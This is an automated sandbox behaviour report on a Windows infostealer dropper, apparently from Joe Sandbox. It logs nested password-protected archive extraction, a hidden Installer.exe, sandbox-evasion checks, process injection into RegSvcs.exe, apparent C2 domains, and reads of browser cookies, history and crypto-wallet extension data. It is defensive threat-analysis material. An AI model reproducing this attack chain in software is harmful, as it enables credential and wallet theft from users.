                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004092C1 GetDlgItem,GetDlgItem,SendMessageW,GetDlgItem,GetWindowLongW,GetDlgItem,SetWindowLongW,GetSystemMenu,EnableMenuItem,GetDlgItem,SetFocus,SetTimer,CoCreateInstance,GetDlgItem,IsWindow,GetDlgItem,EnableWindow,GetDlgItem,ShowWindow,0_2_004092C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004020BF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_004020BF
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\mainJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 31%
                Source: file.exeVirustotal: Detection: 14%
                Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p1299923009167529232566422481 -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe"
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p1299923009167529232566422481 -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\mode.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\mode.comSection loaded: ureg.dllJump to behavior
                Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 3376184 > 1048576
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_00402665
                Source: Installer.exe.9.drStatic PE information: real checksum: 0x795ad should be: 0xe0b11
                Source: 7z.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1a2c6b
                Source: 7z.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x7b29e
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004192C0 push eax; ret 0_2_004192EE
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0026676A push rcx; ret 5_2_0026676B
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_00251280 std::_Xinvalid_argument,GetTickCount,GetTickCount,Sleep,GetTickCount,GetModuleHandleW,GetSystemInfo,FindResourceW,LoadResource,URLDownloadToFileA,ShellExecuteA,GetProcAddress,LockResource,GetProcAddress,VirtualProtect,Concurrency::cancel_current_task,11_2_00251280
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeFile created: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\main\7z.exeJump to dropped file
                Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025128011_2_00251280
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025129011_2_00251290
                Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeAPI coverage: 5.1 %
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025129011_2_00251290
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exe TID: 6412Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040367D GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040367D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004031DC FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004031DC
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00247978 FindFirstFileW,FindFirstFileW,free,5_2_00247978
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025A151 FindFirstFileExW,11_2_0025A151
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0024881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,5_2_0024881C
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0024B5E0 GetSystemInfo,5_2_0024B5E0
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeThread delayed: delay time: 40000Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\extractedJump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\main\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                Source: Installer.exe, 0000000B.00000002.2123014561.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000002.2123014561.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000002.2123014561.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, Installer.exe, 0000000B.00000003.2122322581.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2319086151.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2318932004.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: Installer.exe, 0000000B.00000002.2123014561.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ha^
                Source: Installer.exe, 0000000B.00000002.2123014561.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\4a
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 12_2_0043E470 LdrInitializeThunk,12_2_0043E470
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_002520FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_002520FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_00402665
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025B52D mov eax, dword ptr fs:[00000030h]11_2_0025B52D
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_00256B54 mov eax, dword ptr fs:[00000030h]11_2_00256B54
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_0025BFD4 GetProcessHeap,11_2_0025BFD4
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_002520FF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_002520FF
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_00252262 SetUnhandledExceptionFilter,11_2_00252262
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_00255E89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00255E89
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeCode function: 11_2_00252375 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00252375

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
                Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
                Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
                Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
                Source: Installer.exe, 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 990008Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p1299923009167529232566422481 -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00402744
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0028D670 cpuid 5_2_0028D670
                Source: C:\Users\user\Desktop\file.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_0040247D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004039E7 lstrlenW,GetSystemTimeAsFileTime,GetFileAttributesW,memcpy,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004039E7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405BFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: 12.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.3.Installer.exe.35f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.3.Installer.exe.35f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
